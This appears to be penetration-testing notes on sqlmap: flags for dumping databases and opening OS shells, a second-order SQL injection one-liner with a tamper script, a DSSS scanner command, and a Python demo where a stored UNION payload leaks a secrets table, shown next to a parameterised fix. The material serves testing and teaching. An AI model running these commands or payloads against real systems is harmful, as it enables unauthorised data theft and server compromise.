# SQLmap

## Usage

- Use `-r` with a saved HTTP request:

```shell
sqlmap -r request.txt --dbms=mysql --dump
sqlmap -r request.txt --batch
```

- Select form data automatically:

```shell
sqlmap -u http://<target-IP>/site.php --forms --dump-all
```
| Parameter | Details |
|---|---|
| `-r` | Use an intercepted HTTP request saved to a file |
| `--dbms` | DBMS of the target |
| `--dump` | Dump the entire database |
| `--dump-all` | Dump everything (all databases) |
| `-p` | Testable parameter(s) |
| `--os-shell` | Prompt for an interactive operating system shell |
| `--os-pwn` | Prompt for an OOB shell, Meterpreter or VNC |
| `--tables` | Show tables |
| `-T` | Specify table |
## Advanced Features

### Second Order SQL Injection

When the result of an SQL injection only becomes visible through another resource (the payload is stored by one request and executed when a later request reads it back), use a second order injection. It is even possible to run a script beforehand to log in and obtain a cookie, for example. A tutorial can be found on Le Thanh Phuc's blog.

An example one-liner including a tamper script and a first and second request captured in Burp Suite:

```shell
sqlmap -r $(pwd)/login.request --tamper $(pwd)/second_order_tamper.py --second-req $(pwd)/second.req -p username --proxy http://127.0.0.1:8080 --technique=U --dbms mysql
```

The `second_order_tamper.py` script can be found inside this repository. SQLmap uses it to create users, then logs in through `login.request` and reads the output through `second.req` (delete the cookie from the header). The vulnerable POST parameter is `username`.

Dump the databases and tables afterwards.
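To show the application-side bug that makes the two-request setup above necessary, here is an added, constructed example (not code from this repository or from the tutorial): registration stores the `username` with a bound parameter, so the first request looks clean, but a later profile lookup concatenates the value it reads back from the database. The table names, the `secrets` table and all sample values are assumptions for the demo; the `safe` flag shows the parameterised fix side by side.

```python
import sqlite3


def setup_db():
    # Constructed schema: users plus a table the attacker should never see.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT)")
    conn.execute("CREATE TABLE secrets (note TEXT)")
    conn.execute("INSERT INTO secrets VALUES ('constructed-secret')")
    conn.commit()
    return conn


def register(conn, username, email):
    # First request: the value is bound, so nothing fires here. The payload is
    # merely stored, which is why sqlmap's first request shows no injection.
    cur = conn.execute("INSERT INTO users (username, email) VALUES (?, ?)", (username, email))
    conn.commit()
    return cur.lastrowid


def profile(conn, user_id, safe):
    # Second request: the application re-reads the stored username and uses it
    # in another query. Trusting it because it "came from the database" is the bug.
    stored = conn.execute("SELECT username FROM users WHERE id = ?", (user_id,)).fetchone()[0]
    if safe:
        # Fix: bind the value again; the stored string is data, never SQL.
        rows = conn.execute("SELECT email FROM users WHERE username = ?", (stored,)).fetchall()
    else:
        # Vulnerable: string concatenation lets a stored UNION payload run here.
        rows = conn.execute("SELECT email FROM users WHERE username = '%s'" % stored).fetchall()
    return [r[0] for r in rows]


def demo():
    # Constructed stored payload of the kind a UNION-based second-order test plants.
    conn = setup_db()
    uid = register(conn, "x' UNION SELECT note FROM secrets --", "constructed@example.invalid")
    return profile(conn, uid, safe=False), profile(conn, uid, safe=True)


if __name__ == "__main__":
    leaked, fixed = demo()
    print("vulnerable lookup returned:", leaked)  # the secrets row, not an email
    print("parameterised lookup returned:", fixed)  # only the user's own email
```

The same pattern applies to any value the application reads back from storage (usernames, display names, addresses): a bound parameter on the write does not protect the later read.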
## Other Tools

### Damn Small SQLi Scanner (DSSS)

```shell
python dsss.py -u "http://example.com/index.php?id="
```